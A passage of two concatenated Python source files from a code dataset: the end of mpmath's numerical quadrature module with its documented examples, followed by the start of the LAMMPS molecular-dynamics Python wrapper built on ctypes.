>>> quad(lambda x: 1/sqrt(x), [0, 1], method='tanh-sinh')
1.99999999946942
This problem is not due to the quadrature rule per se, but to
numerical amplification of errors in the nodes. The problem can be
circumvented by temporarily increasing the precision::
>>> mp.dps = 30
>>> a = quad(lambda x: 1/sqrt(x), [0, 1], method='tanh-sinh')
>>> mp.dps = 15
>>> +a
2.0
**Highly variable functions**
For functions that are smooth (in the sense of being infinitely
differentiable) but contain sharp mid-interval peaks or many
"bumps", :func:`~mpmath.quad` may fail to provide full accuracy. For
example, with default settings, :func:`~mpmath.quad` is able to integrate
`\sin(x)` accurately over an interval of length 100 but not over
length 1000::
>>> quad(sin, [0, 100]); 1-cos(100) # Good
0.137681127712316
0.137681127712316
>>> quad(sin, [0, 1000]); 1-cos(1000) # Bad
-37.8587612408485
0.437620923709297
One solution is to break the integration into 10 intervals of
length 100::
>>> quad(sin, linspace(0, 1000, 10)) # Good
0.437620923709297
Another is to increase the degree of the quadrature::
>>> quad(sin, [0, 1000], maxdegree=10) # Also good
0.437620923709297
Whether splitting the interval or increasing the degree is
more efficient differs from case to case. Another example is the
function `1/(1+x^2)`, which has a sharp peak centered around
`x = 0`::
>>> f = lambda x: 1/(1+x**2)
>>> quad(f, [-100, 100]) # Bad
3.64804647105268
>>> quad(f, [-100, 100], maxdegree=10) # Good
3.12159332021646
>>> quad(f, [-100, 0, 100]) # Also good
3.12159332021646
**References**
1. http://mathworld.wolfram.com/DoubleIntegral.html
"""
rule = kwargs.get('method', 'tanh-sinh')
if type(rule) is str:
if rule == 'tanh-sinh':
rule = ctx._tanh_sinh
elif rule == 'gauss-legendre':
rule = ctx._gauss_legendre
else:
raise ValueError("unknown quadrature rule: %s" % rule)
else:
rule = rule(ctx)
verbose = kwargs.get('verbose')
dim = len(points)
orig = prec = ctx.prec
epsilon = ctx.eps/8
m = kwargs.get('maxdegree') or rule.guess_degree(prec)
points = [ctx._as_points(p) for p in points]
try:
ctx.prec += 20
if dim == 1:
v, err = rule.summation(f, points[0], prec, epsilon, m, verbose)
elif dim == 2:
v, err = rule.summation(lambda x: \
rule.summation(lambda y: f(x,y), \
points[1], prec, epsilon, m)[0],
points[0], prec, epsilon, m, verbose)
elif dim == 3:
v, err = rule.summation(lambda x: \
rule.summation(lambda y: \
rule.summation(lambda z: f(x,y,z), \
points[2], prec, epsilon, m)[0],
points[1], prec, epsilon, m)[0],
points[0], prec, epsilon, m, verbose)
else:
raise NotImplementedError("quadrature must have dim 1, 2 or 3")
finally:
ctx.prec = orig
if kwargs.get("error"):
return +v, err
return +v
def quadts(ctx, *args, **kwargs):
"""
Performs tanh-sinh quadrature. The call
quadts(func, *points, ...)
is simply a shortcut for:
quad(func, *points, ..., method=TanhSinh)
For example, a single integral and a double integral:
quadts(lambda x: exp(cos(x)), [0, 1])
quadts(lambda x, y: exp(cos(x+y)), [0, 1], [0, 1])
See the documentation for quad for information about how points
arguments and keyword arguments are parsed.
See documentation for TanhSinh for algorithmic information about
tanh-sinh quadrature.
"""
kwargs['method'] = 'tanh-sinh'
return ctx.quad(*args, **kwargs)
def quadgl(ctx, *args, **kwargs):
"""
Performs Gauss-Legendre quadrature. The call
quadgl(func, *points, ...)
is simply a shortcut for:
quad(func, *points, ..., method=GaussLegendre)
For example, a single integral and a double integral:
quadgl(lambda x: exp(cos(x)), [0, 1])
quadgl(lambda x, y: exp(cos(x+y)), [0, 1], [0, 1])
See the documentation for quad for information about how points
arguments and keyword arguments are parsed.
See documentation for TanhSinh for algorithmic information about
tanh-sinh quadrature.
"""
kwargs['method'] = 'gauss-legendre'
return ctx.quad(*args, **kwargs)
def quadosc(ctx, f, interval, omega=None, period=None, zeros=None):
r"""
Calculates
.. math ::
I = \int_a^b f(x) dx
where at least one of `a` and `b` is infinite and where
`f(x) = g(x) \cos(\omega x + \phi)` for some slowly
decreasing function `g(x)`. With proper input, :func:`~mpmath.quadosc`
can also handle oscillatory integrals where the oscillation
rate is different from a pure sine or cosine wave.
In the standard case when `|a| < \infty, b = \infty`,
:func:`~mpmath.quadosc` works by evaluating the infinite series
.. math ::
I = \int_a^{x_1} f(x) dx +
\sum_{k=1}^{\infty} \int_{x_k}^{x_{k+1}} f(x) dx
where `x_k` are consecutive zeros (alternatively
some other periodic reference point) of `f(x)`.
Accordingly, :func:`~mpmath.quadosc` requires information about the
zeros of `f(x)`. For a periodic function, you can specify
the zeros by either providing the angular frequency `\omega`
(*omega*) or the *period* `2 \pi/\omega`. In general, you can
specify the `n`-th zero by providing the *zeros* arguments.
Below is an example of each::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> f = lambda x: sin(3*x)/(x**2+1)
>>> quadosc(f, [0,inf], omega=3)
0.37833007080198
>>> quadosc(f, [0,inf], period=2*pi/3)
0.37833007080198
>>> quadosc(f, [0,inf], zeros=lambda n: pi*n/3)
0.37833007080198
>>> (ei(3)*exp(-3)-exp(3)*ei(-3))/2 # Computed by Mathematica
0.37833007080198
Note that *zeros* was specified to multiply `n` by the
*half-period*, not the full period. In theory, it does not matter
whether each partial integral is done over a half period or a full
period. However, if done over half-periods, the infinite series
passed to :func:`~mpmath.nsum` becomes an *alternating series* and this
typically makes the extrapolation much more efficient.
Here is an example of an integration over the entire real line,
and a half-infinite integration starting at `-\infty`::
>>> quadosc(lambda x: cos(x)/(1+x**2), [-inf, inf], omega=1)
1.15572734979092
>>> pi/e
1.15572734979092
>>> quadosc(lambda x: cos(x)/x**2, [-inf, -1], period=2*pi)
-0.0844109505595739
>>> cos(1)+si(1)-pi/2
-0.0844109505595738
Of course, the integrand may contain a complex exponential just as
well as a real sine or cosine::
>>> quadosc(lambda x: exp(3*j*x)/(1+x**2), [-inf,inf], omega=3)
(0.156410688228254 + 0.0j)
>>> pi/e**3
0.156410688228254
>>> quadosc(lambda x: exp(3*j*x)/(2+x+x**2), [-inf,inf], omega=3)
(0.00317486988463794 - 0.0447701735209082j)
>>> 2*pi/sqrt(7)/exp(3*(j+sqrt(7))/2)
(0.00317486988463794 - 0.0447701735209082j)
**Non-periodic functions**
If `f(x) = g(x) h(x)` for some function `h(x)` that is not
strictly periodic, *omega* or *period* might not work, and it might
be necessary to use *zeros*.
A notable exception can be made for Bessel functions which, though not
periodic, are "asymptotically periodic" in a sufficiently strong sense
that the sum extrapolation will work out::
>>> quadosc(j0, [0, inf], period=2*pi)
1.0
>>> quadosc(j1, [0, inf], period=2*pi)
1.0
More properly, one should provide the exact Bessel function zeros::
>>> j0zero = lambda n: findroot(j0, pi*(n-0.25))
>>> quadosc(j0, [0, inf], zeros=j0zero)
1.0
For an example where *zeros* becomes necessary, consider the
complete Fresnel integrals
.. math ::
\int_0^{\infty} \cos x^2\,dx = \int_0^{\infty} \sin x^2\,dx
= \sqrt{\frac{\pi}{8}}.
Although the integrands do not decrease in magnitude as
`x \to \infty`, the integrals are convergent since the oscillation
rate increases (causing consecutive periods to asymptotically
cancel out). These integrals are virtually impossible to calculate
to any kind of accuracy using standard quadrature rules. However,
if one provides the correct asymptotic distribution of zeros
(`x_n \sim \sqrt{n}`), :func:`~mpmath.quadosc` works::
>>> mp.dps = 30
>>> f = lambda x: cos(x**2)
>>> quadosc(f, [0,inf], zeros=lambda n:sqrt(pi*n))
0.626657068657750125603941321203
>>> f = lambda x: sin(x**2)
>>> quadosc(f, [0,inf], zeros=lambda n:sqrt(pi*n))
0.626657068657750125603941321203
>>> sqrt(pi/8)
0.626657068657750125603941321203
(Interestingly, these integrals can still be evaluated if one
places some other constant than `\pi` in the square root sign.)
In general, if `f(x) \sim g(x) \cos(h(x))`, the zeros follow
the inverse-function distribution `h^{-1}(x)`::
>>> mp.dps = 15
>>> f = lambda x: sin(exp(x))
>>> quadosc(f, [1,inf], zeros=lambda n: log(n))
-0.25024394235267
>>> pi/2-si(e)
-0.250243942352671
**Non-alternating functions**
If the integrand oscillates around a positive value, without
alternating signs, the extrapolation might fail. A simple trick
that sometimes works is to multiply or divide the frequency by 2::
>>> f = lambda x: 1/x**2+sin(x)/x**4
>>> quadosc(f, [1,inf], omega=1) # Bad
1.28642190869861
>>> quadosc(f, [1,inf], omega=0.5) # Perfect
1.28652953559617
>>> 1+(cos(1)+ci(1)+sin(1))/6
1.28652953559617
**Fast decay**
:func:`~mpmath.quadosc` is primarily useful for slowly decaying
integrands. If the integrand decreases exponentially or faster,
:func:`~mpmath.quad` will likely handle it without trouble (and generally be
much faster than :func:`~mpmath.quadosc`)::
>>> quadosc(lambda x: cos(x)/exp(x), [0, inf], omega=1)
0.5
>>> quad(lambda x: cos(x)/exp(x), [0, inf])
0.5
"""
a, b = ctx._as_points(interval)
a = ctx.convert(a)
b = ctx.convert(b)
if [omega, period, zeros].count(None) != 2:
raise ValueError( \
"must specify exactly one of omega, period, zeros")
if a == ctx.ninf and b == ctx.inf:
s1 = ctx.quadosc(f, [a, 0], omega=omega, zeros=zeros, period=period)
s2 = ctx.quadosc(f, [0, b], omega=omega, zeros=zeros, period=period)
return s1 + s2
if a == ctx.ninf:
if zeros:
return ctx.quadosc(lambda x:f(-x), [-b,-a], lambda n: zeros(-n))
else:
return ctx.quadosc(lambda x:f(-x), [-b,-a], omega=omega, period=period)
if b != ctx.inf:
raise ValueError("quadosc requires an infinite integration interval")
if not zeros:
if omega:
period = 2*ctx.pi/omega
zeros = lambda n: n*period/2
#for n in range(1,10):
# p = zeros(n)
# if p > a:
# break
#if n >= 9:
# raise ValueError("zeros do not appear to be correctly indexed")
n = 1
s = ctx.quadgl(f, [a, zeros(n)])
def term(k):
return ctx.quadgl(f, [zeros(k), zeros(k+1)])
s += ctx.nsum(term, [n, ctx.inf])
return s
if __name__ == '__main__':
import doctest
doctest.testmod()
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/sympy/mpmath/calculus/quadrature.py
|
Python
|
agpl-3.0
| 38,274
|
[
"Gaussian"
] |
a29a71567feb375ef20d04ec3fabb076bba1d1223e1712ebc9f7ba9c7bf67df5
|
# ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrappers on LAMMPS library via ctypes
# for python3 compatibility
from __future__ import print_function
# imports for simple LAMMPS python wrapper module "lammps"
import sys,traceback,types
from ctypes import *
from os.path import dirname,abspath,join
from inspect import getsourcefile
# imports for advanced LAMMPS python wrapper modules "PyLammps" and "IPyLammps"
from collections import namedtuple
import os
import select
import re
import sys
def get_ctypes_int(size):
if size == 4:
return c_int32
elif size == 8:
return c_int64
return c_int
class MPIAbortException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class lammps(object):
# detect if Python is using version of mpi4py that can pass a communicator
has_mpi4py = False
try:
from mpi4py import MPI
from mpi4py import __version__ as mpi4py_version
if mpi4py_version.split('.')[0] in ['2','3']: has_mpi4py = True
except:
pass
# create instance of LAMMPS
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
self.comm = comm
self.opened = 0
# determine module location
modpath = dirname(abspath(getsourcefile(lambda:0)))
self.lib = None
# if a pointer to a LAMMPS object is handed in,
# all symbols should already be available
try:
if ptr: self.lib = CDLL("",RTLD_GLOBAL)
except:
self.lib = None
# load liblammps.so unless name is given
# if name = "g++", load liblammps_g++.so
# try loading the LAMMPS shared object from the location
# of lammps.py with an absolute path,
# so that LD_LIBRARY_PATH does not need to be set for regular install
# fall back to loading with a relative path,
# typically requires LD_LIBRARY_PATH to be set appropriately
if not self.lib:
try:
if not name: self.lib = CDLL(join(modpath,"liblammps.so"),RTLD_GLOBAL)
else: self.lib = CDLL(join(modpath,"liblammps_%s.so" % name),
RTLD_GLOBAL)
except:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
# define ctypes API for each library method
# NOTE: should add one of these for each lib function
self.lib.lammps_extract_box.argtypes = \
[c_void_p,POINTER(c_double),POINTER(c_double),
POINTER(c_double),POINTER(c_double),POINTER(c_double),
POINTER(c_int),POINTER(c_int)]
self.lib.lammps_extract_box.restype = None
self.lib.lammps_reset_box.argtypes = \
[c_void_p,POINTER(c_double),POINTER(c_double),c_double,c_double,c_double]
self.lib.lammps_reset_box.restype = None
self.lib.lammps_gather_atoms.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_gather_atoms.restype = None
self.lib.lammps_gather_atoms_concat.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_gather_atoms_concat.restype = None
self.lib.lammps_gather_atoms_subset.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_int,POINTER(c_int),c_void_p]
self.lib.lammps_gather_atoms_subset.restype = None
self.lib.lammps_scatter_atoms.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_scatter_atoms.restype = None
self.lib.lammps_scatter_atoms_subset.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_int,POINTER(c_int),c_void_p]
self.lib.lammps_scatter_atoms_subset.restype = None
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# but we can pass an MPI communicator from mpi4py v2.0.0 and later
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
# if ptr, then are embedding Python in LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
# with mpi4py v2, can pass MPI communicator to LAMMPS
# need to adjust for type of MPI communicator object
# allow for int (like MPICH) or void* (like OpenMPI)
if comm:
if not lammps.has_mpi4py:
raise Exception('Python mpi4py version is not 2 or 3')
if lammps.MPI._sizeof(lammps.MPI.Comm) == sizeof(c_int):
MPI_Comm = c_int
else:
MPI_Comm = c_void_p
narg = 0
cargs = 0
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lib.lammps_open.argtypes = [c_int, c_char_p*narg, \
MPI_Comm, c_void_p()]
else:
self.lib.lammps_open.argtypes = [c_int, c_int, \
MPI_Comm, c_void_p()]
self.lib.lammps_open.restype = None
self.opened = 1
self.lmp = c_void_p()
comm_ptr = lammps.MPI._addressof(comm)
comm_val = MPI_Comm.from_address(comm_ptr)
self.lib.lammps_open(narg,cargs,comm_val,byref(self.lmp))
else:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
# magic to convert ptr to ctypes ptr
if sys.version_info >= (3, 0):
# Python 3 (uses PyCapsule API)
pythonapi.PyCapsule_GetPointer.restype = c_void_p
pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
self.lmp = c_void_p(pythonapi.PyCapsule_GetPointer(ptr, None))
else:
# Python 2 (uses PyCObject API)
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
# optional numpy support (lazy loading)
self._numpy = None
# set default types
self.c_bigint = get_ctypes_int(self.extract_setting("bigint"))
self.c_tagint = get_ctypes_int(self.extract_setting("tagint"))
self.c_imageint = get_ctypes_int(self.extract_setting("imageint"))
# shut-down LAMMPS instance
def __del__(self):
if self.lmp and self.opened:
self.lib.lammps_close(self.lmp)
self.opened = 0
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
self.opened = 0
def version(self):
return self.lib.lammps_version(self.lmp)
def file(self,file):
if file: file = file.encode()
self.lib.lammps_file(self.lmp,file)
# send a single command
def command(self,cmd):
if cmd: cmd = cmd.encode()
self.lib.lammps_command(self.lmp,cmd)
if self.uses_exceptions and self.lib.lammps_has_error(self.lmp):
sb = create_string_buffer(100)
error_type = self.lib.lammps_get_last_error_message(self.lmp, sb, 100)
error_msg = sb.value.decode().strip()
if error_type == 2:
raise MPIAbortException(error_msg)
raise Exception(error_msg)
# send a list of commands
def commands_list(self,cmdlist):
cmds = [x.encode() for x in cmdlist if type(x) is str]
args = (c_char_p * len(cmdlist))(*cmds)
self.lib.lammps_commands_list(self.lmp,len(cmdlist),args)
# send a string of commands
def commands_string(self,multicmd):
if type(multicmd) is str: multicmd = multicmd.encode()
self.lib.lammps_commands_string(self.lmp,c_char_p(multicmd))
# extract lammps type byte sizes
def extract_setting(self, name):
if name: name = name.encode()
self.lib.lammps_extract_atom.restype = c_int
return int(self.lib.lammps_extract_setting(self.lmp,name))
# extract global info
def extract_global(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
# extract global info
def extract_box(self):
boxlo = (3*c_double)()
boxhi = (3*c_double)()
xy = c_double()
yz = c_double()
xz = c_double()
periodicity = (3*c_int)()
box_change = c_int()
self.lib.lammps_extract_box(self.lmp,boxlo,boxhi,
byref(xy),byref(yz),byref(xz),
periodicity,byref(box_change))
boxlo = boxlo[:3]
boxhi = boxhi[:3]
xy = xy.value
yz = yz.value
xz = xz.value
periodicity = periodicity[:3]
box_change = box_change.value
return boxlo,boxhi,xy,yz,xz,periodicity,box_change
# extract per-atom info
# NOTE: need to insure are converting to/from correct Python type
# e.g. for Python list or NumPy or ctypes
def extract_atom(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
@property
def numpy(self):
if not self._numpy:
import numpy as np
class LammpsNumpyWrapper:
def __init__(self, lmp):
self.lmp = lmp
def _ctype_to_numpy_int(self, ctype_int):
if ctype_int == c_int32:
return np.int32
elif ctype_int == c_int64:
return np.int64
return np.intc
def extract_atom_iarray(self, name, nelem, dim=1):
if name in ['id', 'molecule']:
c_int_type = self.lmp.c_tagint
elif name in ['image']:
c_int_type = self.lmp.c_imageint
else:
c_int_type = c_int
np_int_type = self._ctype_to_numpy_int(c_int_type)
if dim == 1:
tmp = self.lmp.extract_atom(name, 0)
ptr = cast(tmp, POINTER(c_int_type * nelem))
else:
tmp = self.lmp.extract_atom(name, 1)
ptr = cast(tmp[0], POINTER(c_int_type * nelem * dim))
a = np.frombuffer(ptr.contents, dtype=np_int_type)
a.shape = (nelem, dim)
return a
def extract_atom_darray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 2)
ptr = cast(tmp, POINTER(c_double * nelem))
else:
tmp = self.lmp.extract_atom(name, 3)
ptr = cast(tmp[0], POINTER(c_double * nelem * dim))
a = np.frombuffer(ptr.contents)
a.shape = (nelem, dim)
return a
self._numpy = LammpsNumpyWrapper(self)
return self._numpy
# extract compute info
def extract_compute(self,id,style,type):
if id: id = id.encode()
if type == 0:
if style > 0: return None
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
if style == 0:
self.lib.lammps_extract_compute.restype = POINTER(c_int)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
else:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# extract fix info
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if id: id = id.encode()
if style == 0:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
elif (style == 1) or (style == 2):
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
elif type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
else:
return None
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
else:
return None
# extract variable info
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if name: name = name.encode()
if group: group = group.encode()
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal".encode())
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in range(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# return current value of thermo keyword
def get_thermo(self,name):
if name: name = name.encode()
self.lib.lammps_get_thermo.restype = c_double
return self.lib.lammps_get_thermo(self.lmp,name)
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
if name: name = name.encode()
if value: value = str(value).encode()
return self.lib.lammps_set_variable(self.lmp,name,value)
# reset simulation box size
def reset_box(self,boxlo,boxhi,xy,yz,xz):
cboxlo = (3*c_double)(*boxlo)
cboxhi = (3*c_double)(*boxhi)
self.lib.lammps_reset_box(self.lmp,cboxlo,cboxhi,xy,yz,xz)
# return vector of atom properties gathered across procs
# 3 variants to match src/library.cpp
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
# count = number of per-atom valus, 1 for type or charge, 3 for x or f
# returned data is a 1d vector - doc how it is ordered?
# NOTE: need to insure are converting to/from correct Python type
# e.g. for Python list or NumPy or ctypes
def gather_atoms(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
def gather_atoms_concat(self,name,type,count):
if name: name = name.encode()
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms_concat(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms_concat(self.lmp,name,type,count,data)
else: return None
return data
def gather_atoms_subset(self,name,type,count,ndata,ids):
if name: name = name.encode()
if type == 0:
data = ((count*ndata)*c_int)()
self.lib.lammps_gather_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
elif type == 1:
data = ((count*ndata)*c_double)()
self.lib.lammps_gather_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
else: return None
return data
# scatter vector of atom properties across procs
# 2 variants to match src/library.cpp
# name = atom property recognized by LAMMPS in atom->extract()
# type = 0 for integer values, 1 for double values
# count = number of per-atom valus, 1 for type or charge, 3 for x or f
# assume data is of correct type and length, as created by gather_atoms()
# NOTE: need to insure are converting to/from correct Python type
# e.g. for Python list or NumPy or ctypes
def scatter_atoms(self,name,type,count,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
def scatter_atoms_subset(self,name,type,count,ndata,ids,data):
if name: name = name.encode()
self.lib.lammps_scatter_atoms_subset(self.lmp,name,type,count,ndata,ids,data)
# create N atoms on all procs
# N = global number of atoms
# id = ID of each atom (optional, can be None)
# type = type of each atom (1 to Ntypes) (required)
# x = coords of each atom as (N,3) array (required)
# v = velocity of each atom as (N,3) array (optional, can be None)
# NOTE: how could we insure are passing correct type to LAMMPS
# e.g. for Python list or NumPy, etc
# ditto for gather_atoms() above
def create_atoms(self,n,id,type,x,v,image=None,shrinkexceed=False):
if id:
id_lmp = (c_int * n)()
id_lmp[:] = id
else:
id_lmp = id
if image:
image_lmp = (c_int * n)()
image_lmp[:] = image
else:
image_lmp = image
type_lmp = (c_int * n)()
type_lmp[:] = type
self.lib.lammps_create_atoms(self.lmp,n,id_lmp,type_lmp,x,v,image_lmp,
shrinkexceed)
@property
def uses_exceptions(self):
""" Return whether the LAMMPS shared library was compiled with C++ exceptions handling enabled """
try:
if self.lib.lammps_has_error:
return True
except(AttributeError):
return False
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
################################################################################
# Alternative Python Wrapper
# Written by Richard Berger <richard.berger@temple.edu>
################################################################################
class OutputCapture(object):
""" Utility class to capture LAMMPS library output """
def __init__(self):
self.stdout_pipe_read, self.stdout_pipe_write = os.pipe()
self.stdout_fd = 1
def __enter__(self):
self.stdout = os.dup(self.stdout_fd)
os.dup2(self.stdout_pipe_write, self.stdout_fd)
return self
def __exit__(self, type, value, tracebac):
os.dup2(self.stdout, self.stdout_fd)
os.close(self.stdout)
os.close(self.stdout_pipe_read)
os.close(self.stdout_pipe_write)
# check if we have more to read from the pipe
def more_data(self, pipe):
r, _, _ = select.select([pipe], [], [], 0)
return bool(r)
# read the whole pipe
def read_pipe(self, pipe):
out = ""
while self.more_data(pipe):
out += os.read(pipe, 1024).decode()
return out
@property
def output(self):
return self.read_pipe(self.stdout_pipe_read)
class Variable(object):
def __init__(self, lammps_wrapper_instance, name, style, definition):
self.wrapper = lammps_wrapper_instance
self.name = name
self.style = style
self.definition = definition.split()
@property
def value(self):
if self.style == 'atom':
return list(self.wrapper.lmp.extract_variable(self.name, "all", 1))
else:
value = self.wrapper.lmp_print('"${%s}"' % self.name).strip()
try:
return float(value)
except ValueError:
return value
class AtomList(object):
def __init__(self, lammps_wrapper_instance):
self.lmp = lammps_wrapper_instance
self.natoms = self.lmp.system.natoms
self.dimensions = self.lmp.system.dimensions
def __getitem__(self, index):
if self.dimensions == 2:
return Atom2D(self.lmp, index + 1)
return Atom(self.lmp, index + 1)
class Atom(object):
def __init__(self, lammps_wrapper_instance, index):
self.lmp = lammps_wrapper_instance
self.index = index
@property
def id(self):
return int(self.lmp.eval("id[%d]" % self.index))
@property
def type(self):
return int(self.lmp.eval("type[%d]" % self.index))
@property
def mol(self):
return self.lmp.eval("mol[%d]" % self.index)
@property
def mass(self):
return self.lmp.eval("mass[%d]" % self.index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index),
self.lmp.eval("z[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
self.lmp.set("atom", self.index, "z", value[2])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index),
self.lmp.eval("vz[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index),
self.lmp.eval("fz[%d]" % self.index))
@property
def charge(self):
return self.lmp.eval("q[%d]" % self.index)
class Atom2D(Atom):
def __init__(self, lammps_wrapper_instance, index):
super(Atom2D, self).__init__(lammps_wrapper_instance, index)
@property
def position(self):
return (self.lmp.eval("x[%d]" % self.index),
self.lmp.eval("y[%d]" % self.index))
@position.setter
def position(self, value):
self.lmp.set("atom", self.index, "x", value[0])
self.lmp.set("atom", self.index, "y", value[1])
@property
def velocity(self):
return (self.lmp.eval("vx[%d]" % self.index),
self.lmp.eval("vy[%d]" % self.index))
@property
def force(self):
return (self.lmp.eval("fx[%d]" % self.index),
self.lmp.eval("fy[%d]" % self.index))
class variable_set:
def __init__(self, name, variable_dict):
self._name = name
array_pattern = re.compile(r"(?P<arr>.+)\[(?P<index>[0-9]+)\]")
for key, value in variable_dict.items():
m = array_pattern.match(key)
if m:
g = m.groupdict()
varname = g['arr']
idx = int(g['index'])
if varname not in self.__dict__:
self.__dict__[varname] = {}
self.__dict__[varname][idx] = value
else:
self.__dict__[key] = value
def __str__(self):
return "{}({})".format(self._name, ','.join(["{}={}".format(k, self.__dict__[k]) for k in self.__dict__.keys() if not k.startswith('_')]))
def __repr__(self):
return self.__str__()
def get_thermo_data(output):
""" traverse output of runs and extract thermo data columns """
if isinstance(output, str):
lines = output.splitlines()
else:
lines = output
runs = []
columns = []
in_run = False
current_run = {}
for line in lines:
if line.startswith("Per MPI rank memory allocation"):
in_run = True
elif in_run and len(columns) == 0:
# first line after memory usage are column names
columns = line.split()
current_run = {}
for col in columns:
current_run[col] = []
elif line.startswith("Loop time of "):
in_run = False
columns = None
thermo_data = variable_set('ThermoData', current_run)
